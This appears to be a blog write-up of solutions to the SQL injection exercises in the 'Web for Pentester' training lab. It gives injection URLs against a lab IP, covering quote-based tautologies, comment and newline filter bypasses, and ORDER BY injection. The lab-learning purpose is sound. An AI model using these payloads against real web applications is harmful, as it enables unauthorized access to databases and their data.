Web for Pentester -1 SQL Solutions

Example -1

Quote!

If we inject a single quote, using ?name=root’, the table disappears. We probably broke something…

http://172.16.138.193/sqli/example1.php?name=root’%20or%20’1’=’1

Screen Shot 2016-08-01 at 14.54.53

Example -2

ERROR SPACE

http://172.16.138.193/sqli/example2.php?name=root’or’1’=’1

Screen Shot 2016-08-01 at 14.57.07

Example -3

Comments!

http://172.16.138.193/sqli/example3.php?name=root’//or//’1’=’1

Screen Shot 2016-08-01 at 14.58.20

Example -4

Dot!

I add “.” at the beginning of the URL. Also, you can add “.” or “-” …etc.

http://172.16.138.193/sqli/example4.php?id=.2 or 1=1

Screen Shot 2016-08-01 at 14.59.20

Example – 5&6

Error Integer!

“id=” part takes only integer, and it must start with a digit. If you try to write string, you get an error that is “Error Integer Required”. Similar to Example #4.

http://172.16.138.193/sqli/example5.php?id=2 or 1=1

Screen Shot 2016-08-01 at 15.00.32

http://172.16.138.193/sqli/example6.php?id=2 or 1=1

Screen Shot 2016-08-01 at 15.01.05

Example – 7

\n

You can pass the filter by using “\n”.

http://172.16.138.193/sqli/example7.php?id=2%0A%20or%201=1

Screen Shot 2016-08-01 at 15.02.16

Example -8

Order By!

Here, as you know that using “order by”. Careful, use ` with (AltGr + 😉

http://172.16.138.193/sqli/example8.php?order=name`%20desc%20%23

Screen Shot 2016-08-01 at 15.03.54

Example -9

Without (`)

Similar to “Example -8″ but no need to use (`)

http://172.16.138.193/sqli/example9.php?order=name%20asc%20%23

Screen Shot 2016-08-01 at 15.05.47

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s